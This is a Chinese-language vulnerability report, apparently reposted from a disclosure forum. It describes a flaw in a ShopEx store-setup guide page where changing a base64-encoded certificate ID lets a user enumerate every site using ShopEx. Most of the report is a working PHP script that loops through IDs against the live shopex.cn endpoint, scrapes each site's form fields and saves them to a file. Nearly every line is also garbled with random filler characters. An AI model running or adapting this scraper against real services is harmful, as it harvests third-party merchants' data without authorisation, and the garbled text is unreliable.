|
|
简要描述:# T5 X0 T, U+ M5 l
ShopEx某接口缺陷,可遍历所有网站
" }: F7 s/ s, ^1 X: g6 T$ Y, |1 a详细说明:, K! p+ n: n' ^8 n0 X
问题出现在shopex 网店使用向导页面 % S6 O/ `) i5 b4 e) g8 ]4 P$ o( R% _
8 q! r( q& u% G1 T" S6 V
8 A' f& D% k' A- |/ l+ k6 V% e0 }
! K8 v. N1 f3 V! ]. ahttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=, G) ]& G* t+ y* h% q
# s2 F8 x8 e% I
9 E" [& \) r' d
$ B2 W3 ~9 R* `4 ~refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}5 ?% |0 m6 k* `5 V, Z" N/ n
4 g1 A& | ?( \6 m! h' R n
, n9 V+ t1 H* Y4 `- I& ^, ^4 q. \2 d) q4 g2 Q
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 " y" Q2 l1 m: V# _; [
2 d1 q$ e* u9 z4 y/ T/ r) J: [* L; `
) v2 H+ b( `* ~* @: }! R# s! Y<?php* L/ ]8 J) `; V
/ W. a- T: r. D* ^8 ^6 {
for ($i=1; $i < 10000; $i++) { //遍历: j" J; x0 C+ Y3 P
' z5 N# Q; G. _: k8 s! ?& i
ShowshopExD($i);
& m! B* {) I( ?0 W' m
) w, ~" l3 F4 ^ }
$ j$ U) P) B: g4 U; e# o' S8 S6 B3 b! v' a! C+ K3 Y6 p1 o6 i
function ShowshopExD($cid) {* `- w# L2 U( L7 D+ t
: C w2 v% b2 t3 s% n2 {
$url='http://guide.ecos.shopex.cn/step2.php';0 W1 X, S0 k+ {: p
( \8 c" A; z8 X6 k& F4 b/ | $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
8 {5 Z. D6 M7 x! d Y2 p) V- Z( R6 B% a$ _/ I% W Z/ \# w
$url = $url.'?refer='.$refer;( f9 `; [, C6 I- F3 U; ?) l
7 X, S ]5 u- _+ K
$ch = curl_init($url);0 p+ o, y4 h' o3 {* x# s [. s
: U' s8 ?) X7 [ ?/ ^% ~- v0 Q. `
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;* [" g& p2 U6 R' F: y
, j# I- j p! y5 h9 L8 T
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
0 `. {5 F# ?& y8 d& E, j! E: f8 K+ v
$result = curl_exec($ch);, C3 V" I; ~4 y: O$ C$ E
9 C( S. X$ u0 x4 @1 o
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
! {& h, g# T# ]3 s( E: P, F$ a2 S/ s3 g. |2 P1 Q. v
if(strpos($result,$refer))
; m7 R" i. \, `) Z; I/ o; F& K, r* r5 s& d" z8 r, w: P5 k
{; f5 _" b p# U5 R0 g0 T s) H
% M) L4 H( X' U! ^- N( g: L d, G $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
6 s. Y2 p( s9 E* f% c( V! u- Y) v @/ r7 C
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
; M' @" j' ~3 A8 |' A( B
2 \( L C$ d6 t foreach ($value[1] as $key) {/ B! N( B5 Q; a7 \- Y1 Y
1 p/ C7 p+ Z! Q' o# Z preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
* U) A+ ^4 g, _* J1 Q4 A
! M. |, N0 x3 Q( ~# p% M/ ` echo $res[1][0].':'.$res[3][0]."\r\n";7 l1 r) Q$ l9 e# Y _$ g8 v$ `
& U, M+ D8 C1 N $col =$res[1][0].':'.$res[3][0]."\r\n";
) B. P2 l1 M+ R R( j- b; @- T8 }; p/ I# \/ k. A1 `' v8 a
fwrite($fp, $col, strlen($col)); # O! d* A2 y! p. P
7 c' c5 Z7 h8 H; h4 K S# D% v& E }
$ Y2 f$ N" R8 u
; I' H- C/ G& u% q echo '--------------------------------'."\r\n";
1 s8 |0 E1 }4 P1 a2 g8 y
- p" Q3 A- r' B- P3 Y( S fclose($fp);
% t! c% j4 ^, Q" P9 O
: I% o0 {* p; @; ` }" c# w) X# Z( U% I. s' j, N
$ F- z- e$ q1 S6 X
flush();% i0 P1 O6 C- K5 w
Q- y; Z M/ i; X% C
curl_close($ch);
( J) W, s$ N( A6 D+ [5 l- r4 l
}
" A! c$ z9 `0 n: I/ P( v; s9 V* q7 e8 ?& O2 U+ N
?>2 X. z8 t7 p- S
漏洞证明:
) Z* L- }3 Q& ^ D& @5 o& [http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg/ L& m! J6 j3 G% R% W) H6 U0 b
refer换成其他加密方式! @2 K1 i4 o4 a2 K& H
|
|